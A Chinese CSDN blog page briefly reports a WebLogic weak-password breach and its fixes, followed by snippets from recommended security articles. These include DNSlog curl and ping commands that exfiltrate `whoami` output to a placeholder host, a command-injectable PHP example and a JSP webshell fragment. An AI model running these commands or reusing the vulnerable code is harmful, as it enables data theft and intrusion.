JSP SHELL有关的whoami漏洞

最新推荐文章于 2024-05-29 07:40:26 发布
最新推荐文章于 2024-05-29 07:40:26 发布
阅读量2.3k 收藏
点赞数
分类专栏: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/OXiaoMianYiJiu/article/details/50563255
版权

     前一段时间项目被检测出漏洞,经排查是由于weblogic的弱口令的的缘故,造成攻击者通过weblogic控制台上传whoami.war,窃取我们数据库信息
解决方案:
  1、加强weblogic口令的
   2、为weblogic控制台的修改访问端口(但没有实现),只有禁用掉控制台窗口。


参考资料:
http://www.wooyun.org/bugs/wooyun-2010-0125774
http://www.freebuf.com/articles/web/36455.html
笑面依旧
关注
专栏目录
漏洞库】用友系统
weixin_46301214的博客
12-20 441
漏洞库持续更新中,最后更新日期:2023年12月20日用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞图片加载不出来,以后再写用友 U8 cloud upload.jsp 任意文件上传漏洞
whoami
weixin_34015336的博客
08-19 136
功能说明:显示当前登录的用户名,。 转载于:https://www.cnblogs.com/liang545621/p/9503034.html
whoami靶场渗透测试
西电卢本伟的博客
04-27 3411
靶机渗透,文件下载,上传,包含漏洞,sql注入漏洞,提权
java安全——jsp一句话木马
最新发布
qq_53058639的博客
05-29 518
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
PHP文件命令执行漏洞 和 预防
weixin_44422195的博客
01-09 553
PHP代码审计笔记–命令执行漏洞 定义:命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令。 漏洞实例: <?php $target=$_REQUEST['ip']; $cmd = shell_exec('ping '.$target); echo "<pre>{$cmd}</pre>"; ?> 当在网页提交 http://12...
Javaweb安全——JSP Webshell
weixin_43610673的博客
08-22 6470
public static class x extends ClassLoader //继承ClassLoader {#恶意类字节码 BASE64Decoder code = new sun . misc . BASE64Decoder();//将base64解码成byte数组,并传入自定义类的get函数 System . out . println(result . newInstance());}.
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1433
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
漏洞分析】 CVE-2022-22965-Spring漏洞(Spring4Shell)环境搭建及漏洞分析
Zt_Zk的博客
08-25 1221
漏洞分析】 CVE-2022-22965-Spring漏洞(Spring4Shell)分析及修复方法
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 1412
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
被攻击的一些重点系统漏洞整理
鱼的博客
08-18 1365
一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co
java webshell jsp 木马攻防 简介
whatday的专栏
08-04 1万+
目录 基础知识 JSP标签 JSP中的字符串混淆方式 类反射 类加载 对命令执行JSP一句话免杀 原型 类反射绕过 寻找其他类 对于冰蝎JSP一句话的免杀 免杀D盾 免杀百度scanner 总结 防范方法 其他类型的webshell容易免杀的一个主要原因是有eval函数,能够把我们的加密几层后的payload进行解密然后用eval执行,从而绕过杀软的检测。 然而由于JSP的语法没有所谓的eval函数,不像php等语言那么灵活,变形困难,所以JSP的免杀马比较少,相关的文章也比
whoami——web靶场
weixin_46601374的博客
05-19 736
主要漏洞 学习文件下载漏洞、文件包含漏洞、文件上传漏洞的利用 现在开始了 先来nmap扫一下端口 nmap -sS 96a8e233.lxctf.net nmap -sV --allports 96a8e233.lxctf.net 22端口开着,再看看OpenSSH版本5.3 可能存在 OpenSSH 命令注入漏洞(CVE-2020-15778) 139端口和445端口都开着 可以考虑一下永恒之蓝 用御剑扫一扫目录 flag1{6d...
命令执行漏洞
qq_48904485的博客
03-21 2050
一、命令执行介绍 1、命令执行漏洞原理 命令执行漏洞定义:Web应用程序接收用户输入,拼接到要执行的系统命令中执行。 产生原因: 1、用户输入未过滤或净化; 2、拼接到系统命令中执行。 2、PHP下命令执行函数 在PHP中具有执行系统命令功能的函数如下: 1、system 2、exec 3、shell_exec 4、passthru 5、popen 6、proc_popen 7、`反引号 8、ob_start 9、mail函数+LD_PRELOAD执行系统命令 使用示例: L
命令执行漏洞——CMD
weixin_46601374的博客
04-04 1638
第一关 直接在后面跟上?cmd=whoami,即可看到命令执行成功 可以看见www-data; 可以知道这是使用的Ubuntu的服务器,根据服务其的目录可以查看自己想要的信息 当然可以查看一下版本信息 那能不能查看有没有flag: 还真能直接查到,可能是因为是第一关比较简单 第二关 和上一题一样都是需要传参,但是这次的是POST传参 第三关 和上题还不太一样,有whois,我去绕过看看 在后面加?domain=baidu.com...
linux dns 攻击,DNSlog攻击技巧 | CN-SEC 中文网
weixin_35895753的博客
05-13 584
摘要linux: curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚...
经典利用永恒之蓝漏洞对Windows操作系统进行攻击
热门推荐
qq_46202048的博客
11-25 1万+
利用永恒之蓝对Windows进行攻击 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝,永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到
内网渗透攻击技术的利用
kali_Ma的博客
09-14 2229
DCSync 是什么 在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步。当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向 DC 2 发起一个 GetNCChanges 请求,该请求的数据包括需要同步的数据。如果需要同步的数据比较多,则会重复上述过程。DCSync 就是利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口向域控发起数据同步请求。 DCSync 是域渗透中经常会
shellwhoami的意义
06-11
shell脚本中,可以使用反引号或$( )将其嵌入到命令中,以获取当前登录用户的用户名。 在脚本中使用`whoami`可以获取当前登录用户的用户名,可以用于自动化脚本中的一些判断和操作。例如,可以根据当前用户的权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值